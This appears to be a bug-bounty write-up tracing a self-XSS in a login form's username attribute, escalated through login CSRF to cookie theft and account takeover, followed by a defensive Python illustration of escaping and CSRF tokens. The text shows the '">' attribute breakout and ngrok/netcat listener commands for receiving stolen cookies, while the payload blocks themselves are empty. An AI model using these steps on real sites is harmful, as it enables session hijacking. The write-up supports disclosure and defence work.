---
description: >-
  source: https://melguerdawi.medium.com/from-self-xss-to-account-take-over-ato-812c194b61cf
---

# 🔎 From Self XSS to Account Take Over (ATO)
Hello there, I’m Mostafa Elguerdawi. Today I would like to share one of my recent findings in a [HackerOne](https://medium.com/u/6f816e37be2c) program. Let’s call the target https://redacted.com.

While testing this site I found a login function. As usual, I tried to bypass the login using response manipulation, default credentials, and SQL injection, but nothing worked. I then examined the page source and found the username I had entered a little while ago printed inside a `value` attribute.
I thought about trying an XSS injection, so I attempted to inject a double quote (`"`) within the username and found that there is no filtering on it.

So I thought about injecting `<`, which might also work.
Indeed, it worked! So I attempted to inject a complete payload:

```
">
```

And it also succeeded!
Unfortunately, this is only a self-XSS.

## Escalation phase

I ran Burp Suite and intercepted the request during the login attempt.
From the request, I noticed that there is no protection against CSRF, which is not unusual for a login function. I attempted to escalate the self-XSS to a reflected XSS using login CSRF. The payload used:

```
```
Yes, it worked! With the help of ngrok, I managed to obtain anyone’s cookies. I opened two terminal tabs.

First:

```
ngrok http 80
```

Second:

```
sudo nc -nlvp 80
```
I used this payload in the username field:

> _\"\ > \\ \"_

_`\"\ ` is a double quote and a white space encoded in HTML._

This payload retrieves the user’s cookies and sends them to me. With the help of netcat (nc), I can receive these cookies. Final payload:

```
```
Finally, I managed to obtain the cookies.
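As an added illustration from the defender’s side (constructed example, not code from the original post or the affected program): the root cause is the username being echoed unescaped into a `value` attribute, and the escalation works only because the login form accepts a cross-site POST. The snippet shows the vulnerable renderer next to a hardened one that attribute-encodes the input and ties the login form to a per-session CSRF token; all function names are my own.

```python
import html
import hmac
import secrets
from typing import Optional

# Constructed example (not the original post's code): a minimal login-form
# renderer with the write-up's bug (username reflected verbatim into a value
# attribute) beside the hardened version.

def render_login_vulnerable(username: str) -> str:
    """Reflects the submitted username verbatim into the value attribute.
    A username containing "> closes the attribute and the tag, so any
    markup that follows is rendered: the self-XSS from the write-up."""
    return f'<input type="text" name="username" value="{username}">'

def render_login_hardened(username: str, csrf_token: str) -> str:
    """Attribute-encodes the username (quote=True also encodes " and ')
    and embeds a per-session CSRF token, so a cross-site form post cannot
    submit the login with attacker-chosen field values."""
    safe = html.escape(username, quote=True)
    token = html.escape(csrf_token, quote=True)
    return (f'<input type="text" name="username" value="{safe}">'
            f'<input type="hidden" name="csrf_token" value="{token}">')

def breaks_out_of_attribute(rendered: str) -> bool:
    """True if the rendered form contains any tag other than the expected
    <input ...> elements, i.e. the value attribute was closed and new
    markup was injected."""
    tags = rendered.split("<")[1:]
    return any(not t.startswith("input ") for t in tags)

# --- login CSRF: the second half of the chain ----------------------------

def new_csrf_token() -> str:
    """Per-session random token, stored server-side and echoed into the form."""
    return secrets.token_urlsafe(32)

def csrf_token_valid(session_token: str, submitted: Optional[str]) -> bool:
    """Constant-time comparison; a missing or wrong token rejects the login,
    so the forged cross-site POST never reaches the renderer with
    attacker-controlled input."""
    if submitted is None:
        return False
    return hmac.compare_digest(session_token, submitted)
```

The probe string used in the test is the same `">` breakout the write-up describes, followed by a harmless `<b>` tag; the hardened renderer turns it into inert text.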